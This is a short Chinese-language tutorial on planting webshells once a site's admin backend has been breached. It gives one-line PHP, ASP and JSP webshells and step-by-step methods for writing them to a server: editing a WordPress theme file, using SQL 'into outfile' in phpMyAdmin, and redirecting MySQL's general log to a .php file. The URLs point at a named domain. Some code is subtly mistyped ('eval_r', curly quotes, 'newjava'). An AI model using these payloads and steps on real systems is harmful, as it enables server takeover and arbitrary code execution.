当我们通过一些漏洞进入后台之后就要想办法获取网站的控制权限,就是我们所说的拿webshell,这样就可以对网站进行任意编辑,一般都是通过漏洞向目标服务器写入一句话木马来getshell
根据语言的不同,一句话也用多种类型
php一句话
< ?php eval_r($_POST[a])?>
asp一句话
<%eval request(“hihack”)%>或<%execute(request(“hihack”))%>
jsp一句话
<%if(request.getParameter(“f”)!=null)(newjava.io.FileOutputStream (application.getRealPath("\")+request.getParameter(“f”))).write (request.getParameter(“t”).getBytes());%>
wordpress后台拿webshell
通过编辑模板拿webshell
通过选择 主题 编辑 写入一句话
http://www.c2moon.com/wp-admin/theme-editor.php?file=404.php&theme=twentytwentyone
保存之后即可访问
http://www.xxxx.com/wp-content/themes/twentytwentyone/404.php
phpmyadmin下写shell
直接写进网站根目录
select ‘<?php phpinfo();eval($_POST[cmd]);?>’ into outfile ‘C:/wwwroot/www.c2moon.com/2.php’
利用mysql日志文件写shell,这个日志可以在mysql里改变它的存放位置,登录phpmyadmin可以修改
这个存放位置,并且可以修改它的后缀名。所以可以修改成php的后缀名就能获取一个webshell
开启日志记录
SET global general_log = “ON”; 日志保存状态开启;
SET global general_log_file =’/WWWroot/www.c2moon.com/s.php’; 修改日志的保存位置。
直接访问http://www.c2moon.com/s.php